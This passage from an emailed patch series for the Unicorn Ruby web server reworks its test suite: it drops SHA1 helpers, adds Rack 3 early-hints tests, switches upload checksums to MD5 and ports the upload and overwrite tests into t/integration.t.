-t_begin "setup and start" && {
-	unicorn_setup
-	rtmpfiles unicorn_config_tmp one_meg
-	dd if=/dev/zero bs=1M count=1 of=$one_meg
-	cat >> $unicorn_config <<EOF
-after_fork do |server, worker|
-  File.open("$fifo", "wb") { |fp| fp.syswrite "START" }
-end
-EOF
-	cat $unicorn_config > $unicorn_config_tmp
-	echo client_body_buffer_size 0 >> $unicorn_config
-	unicorn -D -c $unicorn_config t0116.ru
-	unicorn_wait_start
-	fs_class=Unicorn::TmpIO
-	mem_class=StringIO
-
-	test x"$(cat $fifo)" = xSTART
-}
-
-t_begin "class for a zero-byte file should be StringIO" && {
-	> $tmp
-	test xStringIO = x"$(curl -T $tmp -sSf http://$listen/input_class)"
-}
-
-t_begin "class for a 1 byte file should be filesystem-backed" && {
-	echo > $tmp
-	test x$fs_class = x"$(curl -T $tmp -sSf http://$listen/tmp_class)"
-}
-
-t_begin "reload with default client_body_buffer_size" && {
-	mv $unicorn_config_tmp $unicorn_config
-	kill -HUP $unicorn_pid
-	test x"$(cat $fifo)" = xSTART
-}
-
-t_begin "class for a 1 byte file should be memory-backed" && {
-	echo > $tmp
-	test x$mem_class = x"$(curl -T $tmp -sSf http://$listen/tmp_class)"
-}
-
-t_begin "class for a random blob file should be filesystem-backed" && {
-	resp="$(curl -T random_blob -sSf http://$listen/tmp_class)"
-	test x$fs_class = x"$resp"
-}
-
-t_begin "one megabyte file should be filesystem-backed" && {
-	resp="$(curl -T $one_meg -sSf http://$listen/tmp_class)"
-	test x$fs_class = x"$resp"
-}
-
-t_begin "reload with a big client_body_buffer_size" && {
-	echo "client_body_buffer_size(1024 * 1024)" >> $unicorn_config
-	kill -HUP $unicorn_pid
-	test x"$(cat $fifo)" = xSTART
-}
-
-t_begin "one megabyte file should be memory-backed" && {
-	resp="$(curl -T $one_meg -sSf http://$listen/tmp_class)"
-	test x$mem_class = x"$resp"
-}
-
-t_begin "one megabyte + 1 byte file should be filesystem-backed" && {
-	echo >> $one_meg
-	resp="$(curl -T $one_meg -sSf http://$listen/tmp_class)"
-	test x$fs_class = x"$resp"
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr" && {
-	check_stderr
-}
-
-t_done

[-- Attachment #18: 0017-tests-get-rid-of-sha1sum.rb-and-rsha1-sh-function.patch --]
[-- Type: text/x-diff, Size: 1255 bytes --]

From b47912160f2336dde3901e588cc23fb2c2f8d9dc Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:46 +0000
Subject: [PATCH 17/23] tests: get rid of sha1sum.rb and rsha1() sh function

These are no longer needed since Perl has long included
Digest::SHA.
---
 t/bin/sha1sum.rb | 17 -----------------
 t/test-lib.sh    |  4 ----
 2 files changed, 21 deletions(-)
 delete mode 100755 t/bin/sha1sum.rb

diff --git a/t/bin/sha1sum.rb b/t/bin/sha1sum.rb
deleted file mode 100755
index 53d68ce..0000000
--- a/t/bin/sha1sum.rb
+++ /dev/null
@@ -1,17 +0,0 @@
-#!/usr/bin/env ruby
-# -*- encoding: binary -*-
-# Reads from stdin and outputs the SHA1 hex digest of the input
-
-require 'digest/sha1'
-$stdout.sync = $stderr.sync = true
-$stdout.binmode
-$stdin.binmode
-bs = 16384
-digest = Digest::SHA1.new
-if buf = $stdin.read(bs)
-  begin
-    digest.update(buf)
-  end while $stdin.read(bs, buf)
-end
-
-$stdout.syswrite("#{digest.hexdigest}\n")
diff --git a/t/test-lib.sh b/t/test-lib.sh
index e70d0c6..8613144 100644
--- a/t/test-lib.sh
+++ b/t/test-lib.sh
@@ -123,7 +123,3 @@ unicorn_wait_start () {
 	# no need to play tricks with FIFOs since we got "ready_pipe" now
 	unicorn_pid=$(cat $pid)
 }
-
-rsha1 () {
-	sha1sum.rb
-}

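For reference, the removed rsha1() shell helper is a couple of lines with
the Digest::SHA module bundled with Perl, using the same addfile() pattern
the Perl tests already rely on (the file name is illustrative):

	use v5.14;
	use Digest::SHA;

	# SHA-1 hex digest of a file, equivalent to the old `rsha1 < file':
	open my $fh, '<', 't/random_blob' or die "open: $!";
	say Digest::SHA->new(1)->addfile($fh)->hexdigest;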
[-- Attachment #19: 0018-early_hints-supports-Rack-3-array-headers.patch --]
[-- Type: text/x-diff, Size: 4606 bytes --]

From 6ad9f4b54ee16ffecea7e16b710552b45db33a16 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:47 +0000
Subject: [PATCH 18/23] early_hints supports Rack 3 array headers

We can hoist out append_headers into a new method and use it in
both e103_response_write and http_response_write.

t/integration.t now tests early_hints with both possible
values of check_client_connection.
---
 t/integration.ru |  7 +++++++
 t/integration.t  | 47 ++++++++++++++++++++++++++++++++++++++++++-----
 2 files changed, 49 insertions(+), 5 deletions(-)

diff --git a/t/integration.ru b/t/integration.ru
index edc408c..dab384d 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -5,6 +5,11 @@
 # this goes for t/integration.t  We'll try to put as many tests
 # in here as possible to avoid startup overhead of Ruby.
 
+def early_hints(env, val)
+  env['rack.early_hints'].call('link' => val) # val may be ary or string
+  [ 200, {}, [ val.class.to_s ] ]
+end
+
 $orig_rack_200 = nil
 def tweak_status_code
   $orig_rack_200 = Rack::Utils::HTTP_STATUS_CODES[200]
@@ -81,6 +86,8 @@ def rack_input_tests(env)
     when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
     when '/pid'; [ 200, {}, [ "#$$\n" ] ]
+    when '/early_hints_rack2'; early_hints(env, "r\n2")
+    when '/early_hints_rack3'; early_hints(env, %w(r 3))
     else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index 855c260..8433497 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -13,8 +13,16 @@ my $t0 = time;
 my $conf = "$tmpdir/u.conf.rb";
 open my $conf_fh, '>', $conf;
 $conf_fh->autoflush(1);
+my $u1 = "$tmpdir/u1";
+print $conf_fh <<EOM;
+early_hints true
+listen "$u1"
+listen "$host_port" # TODO: remove this requirement for SIGHUP
+EOM
 my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');
+my $fifo = "$tmpdir/fifo";
+POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
@@ -102,6 +110,26 @@ $c = tcp_start($srv, 'GET /nil-header-value HTTP/1.0');
 is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
 	'nil header value accepted for broken apps') or diag(explain($hdr));
 
+my $ck_early_hints = sub {
+	my ($note) = @_;
+	$c = unix_start($u1, 'GET /early_hints_rack2 HTTP/1.0');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 103\b!, 'got 103 for rack 2 value');
+	is_deeply(['link: r', 'link: 2'], $hdr, 'rack 2 hints match '.$note);
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200\b!, 'got 200 afterwards');
+	is(readline($c), 'String', 'early hints used a String for rack 2');
+
+	$c = unix_start($u1, 'GET /early_hints_rack3 HTTP/1.0');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 103\b!, 'got 103 for rack 3');
+	is_deeply(['link: r', 'link: 3'], $hdr, 'rack 3 hints match '.$note);
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200\b!, 'got 200 afterwards');
+	is(readline($c), 'Array', 'early hints used an Array for rack 3');
+};
+$ck_early_hints->('ccc off'); # we'll retest later
+
 if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
 	$c = tcp_start($srv, 'POST /tweak-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
@@ -154,6 +182,7 @@ if ('bad requests') {
 # input tests
 my ($blob_size, $blob_hash);
 SKIP: {
+	skip 'SKIP_EXPENSIVE on', 1 if $ENV{SKIP_EXPENSIVE};
 	CORE::open(my $rh, '<', 't/random_blob') or
 		skip "t/random_blob not generated $!", 1;
 	$blob_size = -s $rh;
@@ -232,16 +261,24 @@ SKIP: {
 
 # SIGHUP-able stuff goes here
 
+if ('check_client_connection') {
+	print $conf_fh <<EOM; # appending to existing
+check_client_connection true
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+	$ar->do_kill('HUP');
+	open my $fifo_fh, '<', $fifo;
+	my $wpid = readline($fifo_fh);
+	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
+	$ck_early_hints->('ccc on');
+}
+
 if ('max_header_len internal API') {
 	undef $c;
 	my $req = 'GET / HTTP/1.0';
 	my $len = length($req."\r\n\r\n");
-	my $fifo = "$tmpdir/fifo";
-	POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
-	print $conf_fh <<EOM;
+	print $conf_fh <<EOM; # appending to existing
 Unicorn::HttpParser.max_header_len = $len
-listen "$host_port" # TODO: remove this requirement for SIGHUP
-after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
 EOM
 	$ar->do_kill('HUP');
 	open my $fifo_fh, '<', $fifo;

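For context on the early-hints assertions above, the exchange for the
Rack 3 case looks roughly like the following; the reason phrases and the
elided 200 headers are illustrative, and the tests only match the status
codes, the link: lines and the body:

	GET /early_hints_rack3 HTTP/1.0

	HTTP/1.1 103 Early Hints
	link: r
	link: 3

	HTTP/1.1 200 OK
	...
	Array

The Rack 2 variant hands rack.early_hints a newline-joined String ("r\n2")
and still comes out as two separate link: lines, which is what the
'rack 2 hints match' check asserts.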
[-- Attachment #20: 0019-test_server-drop-early_hints-test.patch --]
[-- Type: text/x-diff, Size: 1737 bytes --]

From 3e6bc9fb589fd88469349a38a77704c3333623e0 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:48 +0000
Subject: [PATCH 19/23] test_server: drop early_hints test

t/integration.t is already more complete in that it tests
both Rack 2 and 3 along with both possible values of
check_client_connection.
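
For reference, the early_hints API exercised by both suites is just a
callable in the Rack env (sketch only, loosely mirroring the handler
removed below):

  # needs `early_hints true' in the unicorn config
  run lambda { |env|
    eh = env['rack.early_hints']  # callable provided by the server
    eh.call('link' => '</style.css>; rel=preload; as=style') if eh
    [200, { 'content-type' => 'text/plain' }, ["hello\n"]]
  }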
---
 test/unit/test_server.rb | 31 -------------------------------
 1 file changed, 31 deletions(-)

diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index fe98fcc..0a710d1 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -23,17 +23,6 @@ def call(env)
   end
 end
 
-class TestEarlyHintsHandler
-  def call(env)
-    while env['rack.input'].read(4096)
-    end
-    env['rack.early_hints'].call(
-      "Link" => "</style.css>; rel=preload; as=style\n</script.js>; rel=preload"
-    )
-    [200, { 'content-type' => 'text/plain' }, ['hello!\n']]
-  end
-end
-
 class TestRackAfterReply
   def initialize
     @called = false
@@ -112,26 +101,6 @@ def test_preload_app_config
     tmp.close!
   end
 
-  def test_early_hints
-    teardown
-    redirect_test_io do
-      @server = HttpServer.new(TestEarlyHintsHandler.new,
-                               :listeners => [ "127.0.0.1:#@port"],
-                               :early_hints => true)
-      @server.start
-    end
-
-    sock = tcp_socket('127.0.0.1', @port)
-    sock.syswrite("GET / HTTP/1.0\r\n\r\n")
-
-    responses = sock.read(4096)
-    assert_match %r{\AHTTP/1.[01] 103\b}, responses
-    assert_match %r{^Link: </style\.css>}, responses
-    assert_match %r{^Link: </script\.js>}, responses
-
-    assert_match %r{^HTTP/1.[01] 200\b}, responses
-  end
-
   def test_after_reply
     teardown
 

[-- Attachment #21: 0020-t-integration.t-switch-PUT-tests-to-MD5-reuse-buffer.patch --]
[-- Type: text/x-diff, Size: 3740 bytes --]

From cb826915cdd1881cbcfc1fb4e645d26244dfda71 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:49 +0000
Subject: [PATCH 20/23] t/integration.t: switch PUT tests to MD5, reuse buffers

MD5 is faster, and these tests aren't meant to be secure;
they're just checking for data corruption.
Content-MD5 is a supported HTTP trailer, and we can verify
it here to obsolete other tests.

Furthermore, we can reuse buffers on env['rack.input'].read
calls to avoid malloc(3) and GC overhead.

Combined, these give roughly a 3% speedup for t/integration.t
on my system.
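
For illustration (not part of this patch), the buffer-reuse pattern and
the trailer check look roughly like this in plain Ruby; digest_input is
a made-up helper name:

  require 'digest/md5'

  # read rack.input in 16k chunks, reusing one String buffer instead of
  # allocating a fresh one per read call
  def digest_input(input, bs = 16384)
    dig = Digest::MD5.new
    if buf = input.read(bs)            # first read allocates the buffer
      begin
        dig.update(buf)
      end while input.read(bs, buf)    # later reads refill the same buffer
    end
    dig
  end

  # the Content-MD5 trailer value is the base64 of the raw 16-byte digest:
  #   env['HTTP_CONTENT_MD5'].unpack('m')[0] == digest_input(input).digest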
---
 t/integration.ru   | 20 +++++++++++++++-----
 t/integration.t    |  5 ++---
 t/preread_input.ru | 17 ++++++++++++-----
 3 files changed, 29 insertions(+), 13 deletions(-)

diff --git a/t/integration.ru b/t/integration.ru
index dab384d..086126a 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -55,8 +55,8 @@ def env_dump(env)
 def rack_input_tests(env)
   return [ 100, {}, [] ] if /\A100-continue\z/i =~ env['HTTP_EXPECT']
   cap = 16384
-  require 'digest/sha1'
-  digest = Digest::SHA1.new
+  require 'digest/md5'
+  dig = Digest::MD5.new
   input = env['rack.input']
   case env['PATH_INFO']
   when '/rack_input/size_first'; input.size
@@ -68,11 +68,21 @@ def rack_input_tests(env)
   if buf = input.read(rand(cap))
     begin
       raise "#{buf.size} > #{cap}" if buf.size > cap
-      digest.update(buf)
+      dig.update(buf)
     end while input.read(rand(cap), buf)
+    buf.clear # remove this call if Ruby ever gets escape analysis
   end
-  [ 200, {'content-length' => '40', 'content-type' => 'text/plain'},
-    [ digest.hexdigest ] ]
+  h = { 'content-type' => 'text/plain' }
+  if env['HTTP_TRAILER'] =~ /\bContent-MD5\b/i
+    cmd5_b64 = env['HTTP_CONTENT_MD5'] or return [500, {}, ['No Content-MD5']]
+    cmd5_bin = cmd5_b64.unpack('m')[0]
+    if cmd5_bin != dig.digest
+      h['content-length'] = cmd5_b64.size.to_s
+      return [ 500, h, [ cmd5_b64 ] ]
+    end
+  end
+  h['content-length'] = '32'
+  [ 200, h, [ dig.hexdigest ] ]
 end
 
 run(lambda do |env|
diff --git a/t/integration.t b/t/integration.t
index 8433497..38a9675 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -27,7 +27,6 @@ my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
 		my $bs = $opt{bs} // 16384;
-		require Digest::MD5;
 		my $dig = Digest::MD5->new;
 		print $out <<EOM;
 PUT $path HTTP/1.1\r
@@ -186,8 +185,8 @@ SKIP: {
 	CORE::open(my $rh, '<', 't/random_blob') or
 		skip "t/random_blob not generated $!", 1;
 	$blob_size = -s $rh;
-	require Digest::SHA;
-	$blob_hash = Digest::SHA->new(1)->addfile($rh)->hexdigest;
+	require Digest::MD5;
+	$blob_hash = Digest::MD5->new->addfile($rh)->hexdigest;
 
 	my $ck_hash = sub {
 		my ($sub, $path, %opt) = @_;
diff --git a/t/preread_input.ru b/t/preread_input.ru
index f0a1748..18af221 100644
--- a/t/preread_input.ru
+++ b/t/preread_input.ru
@@ -1,15 +1,22 @@
 #\-E none
-require 'digest/sha1'
+require 'digest/md5'
 require 'unicorn/preread_input'
 use Unicorn::PrereadInput
 nr = 0
 run lambda { |env|
   $stderr.write "app dispatch: #{nr += 1}\n"
   input = env["rack.input"]
-  dig = Digest::SHA1.new
-  while buf = input.read(16384)
-    dig.update(buf)
+  dig = Digest::MD5.new
+  if buf = input.read(16384)
+    begin
+      dig.update(buf)
+    end while input.read(16384, buf)
+    buf.clear # remove this call if Ruby ever gets escape analysis
+  end
+  if env['HTTP_TRAILER'] =~ /\bContent-MD5\b/i
+    cmd5_b64 = env['HTTP_CONTENT_MD5'] or return [500, {}, ['No Content-MD5']]
+    cmd5_bin = cmd5_b64.unpack('m')[0]
+    return [500, {}, [ cmd5_b64 ] ] if cmd5_bin != dig.digest
   end
-
   [ 200, {}, [ dig.hexdigest ] ]
 }

[-- Attachment #22: 0021-tests-move-test_upload.rb-tests-to-t-integration.t.patch --]
[-- Type: text/x-diff, Size: 12280 bytes --]

From 181e4b5b6339fc5e9c3ad7d3690b736f6bd038aa Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:50 +0000
Subject: [PATCH 21/23] tests: move test_upload.rb tests to t/integration.t

The overread tests are ported over, and checksumming alone
is enough to guard against data corruption.

Randomizing the size of `read' calls on the client side will
shake out any boundary bugs on the server side.
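
A rough Ruby rendering of the idea (the real tests stay in Perl 5; the
address and path below are placeholders):

  require 'socket'

  sock = TCPSocket.new('127.0.0.1', 8080)   # placeholder unicorn listener
  sock.write("PUT /rack_input HTTP/1.1\r\nHost: example\r\n" \
             "Transfer-Encoding: chunked\r\n\r\n")
  File.open('t/random_blob', 'rb') do |f|
    # random chunk size per read so the server hits different buffer
    # boundaries on every run
    while chunk = f.read(999 + rand(0xffff))
      # Ruby 2.5+ multi-argument write: size line, payload, CRLF
      sock.write("#{chunk.bytesize.to_s(16)}\r\n", chunk, "\r\n")
    end
  end
  sock.write("0\r\n\r\n")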
---
 t/integration.t          |  32 ++++-
 test/unit/test_upload.rb | 301 ---------------------------------------
 2 files changed, 27 insertions(+), 306 deletions(-)
 delete mode 100644 test/unit/test_upload.rb

diff --git a/t/integration.t b/t/integration.t
index 38a9675..a568758 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -26,7 +26,6 @@ POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
-		my $bs = $opt{bs} // 16384;
 		my $dig = Digest::MD5->new;
 		print $out <<EOM;
 PUT $path HTTP/1.1\r
@@ -36,7 +35,7 @@ Trailer: Content-MD5\r
 EOM
 		my ($buf, $r);
 		while (1) {
-			$r = read($in, $buf, $bs);
+			$r = read($in, $buf, 999 + int(rand(0xffff)));
 			last if $r == 0;
 			printf $out "%x\r\n", length($buf);
 			print $out $buf, "\r\n";
@@ -46,15 +45,15 @@ EOM
 	},
 	identity => sub {
 		my ($in, $out, $path, %opt) = @_;
-		my $bs = $opt{bs} // 16384;
 		my $clen = $opt{-s} // -s $in;
 		print $out <<EOM;
 PUT $path HTTP/1.0\r
 Content-Length: $clen\r
 \r
 EOM
-		my ($buf, $r, $len);
+		my ($buf, $r, $len, $bs);
 		while ($clen) {
+			$bs = 999 + int(rand(0xffff));
 			$len = $clen > $bs ? $bs : $clen;
 			$r = read($in, $buf, $len);
 			die 'premature EOF' if $r == 0;
@@ -192,8 +191,10 @@ SKIP: {
 		my ($sub, $path, %opt) = @_;
 		seek($rh, 0, SEEK_SET);
 		$c = tcp_start($srv);
-		$c->autoflush(0);
+		$c->autoflush($opt{sync} // 0);
 		$PUT{$sub}->($rh, $c, $path, %opt);
+		defined($opt{overwrite}) and
+			print { $c } ('x' x $opt{overwrite});
 		$c->flush or die $!;
 		($status, $hdr) = slurp_hdr($c);
 		is(readline($c), $blob_hash, "$sub $path");
@@ -205,6 +206,27 @@ SKIP: {
 	$ck_hash->('chunked_md5', '/rack_input/size_first');
 	$ck_hash->('chunked_md5', '/rack_input/rewind_first');
 
+	$ck_hash->('identity', '/rack_input', -s => $blob_size, sync => 1);
+	$ck_hash->('chunked_md5', '/rack_input', sync => 1);
+
+	# ensure small overwrites don't get checksummed
+	$ck_hash->('identity', '/rack_input', -s => $blob_size,
+			overwrite => 1); # one extra byte
+
+	# excessive overwrite truncated
+	$c = tcp_start($srv);
+	$c->autoflush(0);
+	print $c "PUT /rack_input HTTP/1.0\r\nContent-Length: 1\r\n\r\n";
+	if (1) {
+		local $SIG{PIPE} = 'IGNORE';
+		my $buf = "\0" x 8192;
+		my $n = 0;
+		my $end = time + 5;
+		$! = 0;
+		while (print $c $buf and time < $end) { ++$n }
+		ok($!, 'overwrite truncated') or diag "n=$n err=$! ".time;
+	}
+	undef $c;
 
 	$curl // skip 'no curl found in PATH', 1;
 
diff --git a/test/unit/test_upload.rb b/test/unit/test_upload.rb
deleted file mode 100644
index 76e6c1c..0000000
--- a/test/unit/test_upload.rb
+++ /dev/null
@@ -1,301 +0,0 @@
-# -*- encoding: binary -*-
-
-# Copyright (c) 2009 Eric Wong
-require './test/test_helper'
-require 'digest/md5'
-
-include Unicorn
-
-class UploadTest < Test::Unit::TestCase
-
-  def setup
-    @addr = ENV['UNICORN_TEST_ADDR'] || '127.0.0.1'
-    @port = unused_port
-    @hdr = {'Content-Type' => 'text/plain', 'Content-Length' => '0'}
-    @bs = 4096
-    @count = 256
-    @server = nil
-
-    # we want random binary data to test 1.9 encoding-aware IO craziness
-    @random = File.open('/dev/urandom','rb')
-    @sha1 = Digest::SHA1.new
-    @sha1_app = lambda do |env|
-      input = env['rack.input']
-      resp = {}
-
-      @sha1.reset
-      while buf = input.read(@bs)
-        @sha1.update(buf)
-      end
-      resp[:sha1] = @sha1.hexdigest
-
-      # rewind and read again
-      input.rewind
-      @sha1.reset
-      while buf = input.read(@bs)
-        @sha1.update(buf)
-      end
-
-      if resp[:sha1] == @sha1.hexdigest
-        resp[:sysread_read_byte_match] = true
-      end
-
-      if expect_size = env['HTTP_X_EXPECT_SIZE']
-        if expect_size.to_i == input.size
-          resp[:expect_size_match] = true
-        end
-      end
-      resp[:size] = input.size
-      resp[:content_md5] = env['HTTP_CONTENT_MD5']
-
-      [ 200, @hdr.merge({'X-Resp' => resp.inspect}), [] ]
-    end
-  end
-
-  def teardown
-    redirect_test_io { @server.stop(false) } if @server
-    @random.close
-    reset_sig_handlers
-  end
-
-  def test_put
-    start_server(@sha1_app)
-    sock = tcp_socket(@addr, @port)
-    sock.syswrite("PUT / HTTP/1.0\r\nContent-Length: #{length}\r\n\r\n")
-    @count.times do |i|
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      sock.syswrite(buf)
-    end
-    read = sock.read.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal length, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-  end
-
-  def test_put_content_md5
-    md5 = Digest::MD5.new
-    start_server(@sha1_app)
-    sock = tcp_socket(@addr, @port)
-    sock.syswrite("PUT / HTTP/1.0\r\nTransfer-Encoding: chunked\r\n" \
-                  "Trailer: Content-MD5\r\n\r\n")
-    @count.times do |i|
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      md5.update(buf)
-      sock.syswrite("#{'%x' % buf.size}\r\n")
-      sock.syswrite(buf << "\r\n")
-    end
-    sock.syswrite("0\r\n")
-
-    content_md5 = [ md5.digest! ].pack('m').strip.freeze
-    sock.syswrite("Content-MD5: #{content_md5}\r\n\r\n")
-    read = sock.read.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal length, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-    assert_equal content_md5, resp[:content_md5]
-  end
-
-  def test_put_trickle_small
-    @count, @bs = 2, 128
-    start_server(@sha1_app)
-    assert_equal 256, length
-    sock = tcp_socket(@addr, @port)
-    hdr = "PUT / HTTP/1.0\r\nContent-Length: #{length}\r\n\r\n"
-    @count.times do
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      hdr << buf
-      sock.syswrite(hdr)
-      hdr = ''
-      sleep 0.6
-    end
-    read = sock.read.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal length, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-  end
-
-  def test_put_keepalive_truncates_small_overwrite
-    start_server(@sha1_app)
-    sock = tcp_socket(@addr, @port)
-    to_upload = length + 1
-    sock.syswrite("PUT / HTTP/1.0\r\nContent-Length: #{to_upload}\r\n\r\n")
-    @count.times do
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      sock.syswrite(buf)
-    end
-    sock.syswrite('12345') # write 4 bytes more than we expected
-    @sha1.update('1')
-
-    buf = sock.readpartial(4096)
-    while buf !~ /\r\n\r\n/
-      buf << sock.readpartial(4096)
-    end
-    read = buf.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal to_upload, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-  end
-
-  def test_put_excessive_overwrite_closed
-    tmp = Tempfile.new('overwrite_check')
-    tmp.sync = true
-    start_server(lambda { |env|
-      nr = 0
-      while buf = env['rack.input'].read(65536)
-        nr += buf.size
-      end
-      tmp.write(nr.to_s)
-      [ 200, @hdr, [] ]
-    })
-    sock = tcp_socket(@addr, @port)
-    buf = ' ' * @bs
-    sock.syswrite("PUT / HTTP/1.0\r\nContent-Length: #{length}\r\n\r\n")
-
-    @count.times { sock.syswrite(buf) }
-    assert_raise(Errno::ECONNRESET, Errno::EPIPE) do
-      ::Unicorn::Const::CHUNK_SIZE.times { sock.syswrite(buf) }
-    end
-    sock.gets
-    tmp.rewind
-    assert_equal length, tmp.read.to_i
-  end
-
-  # Despite reading numerous articles and inspecting the 1.9.1-p0 C
-  # source, Eric Wong will never trust that we're always handling
-  # encoding-aware IO objects correctly.  Thus this test uses shell
-  # utilities that should always operate on files/sockets on a
-  # byte-level.
-  def test_uncomfortable_with_onenine_encodings
-    # POSIX doesn't require all of these to be present on a system
-    which('curl') or return
-    which('sha1sum') or return
-    which('dd') or return
-
-    start_server(@sha1_app)
-
-    tmp = Tempfile.new('dd_dest')
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=#{@bs}", "count=#{@count}"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
-    resp = `curl -isSfN -T#{tmp.path} http://#@addr:#@port/`
-    assert $?.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-
-    # small StringIO path
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=1024", "count=1"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
-    resp = `curl -isSfN -T#{tmp.path} http://#@addr:#@port/`
-    assert $?.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-  end
-
-  def test_chunked_upload_via_curl
-    # POSIX doesn't require all of these to be present on a system
-    which('curl') or return
-    which('sha1sum') or return
-    which('dd') or return
-
-    start_server(@sha1_app)
-
-    tmp = Tempfile.new('dd_dest')
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=#{@bs}", "count=#{@count}"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
-    cmd = "curl -H 'X-Expect-Size: #{tmp.size}' --tcp-nodelay \
-           -isSf --no-buffer -T- " \
-          "http://#@addr:#@port/"
-    resp = Tempfile.new('resp')
-    resp.sync = true
-
-    rd, wr = IO.pipe.each do |io|
-      io.sync = io.close_on_exec = true
-    end
-    pid = spawn(*cmd, { 0 => rd, 1 => resp })
-    rd.close
-
-    tmp.rewind
-    @count.times { |i|
-      wr.write(tmp.read(@bs))
-      sleep(rand / 10) if 0 == i % 8
-    }
-    wr.close
-    pid, status = Process.waitpid2(pid)
-
-    resp.rewind
-    resp = resp.read
-    assert status.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-    assert_match(/expect_size_match/, resp)
-  end
-
-  def test_curl_chunked_small
-    # POSIX doesn't require all of these to be present on a system
-    which('curl') or return
-    which('sha1sum') or return
-    which('dd') or return
-
-    start_server(@sha1_app)
-
-    tmp = Tempfile.new('dd_dest')
-    # small StringIO path
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=1024", "count=1"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
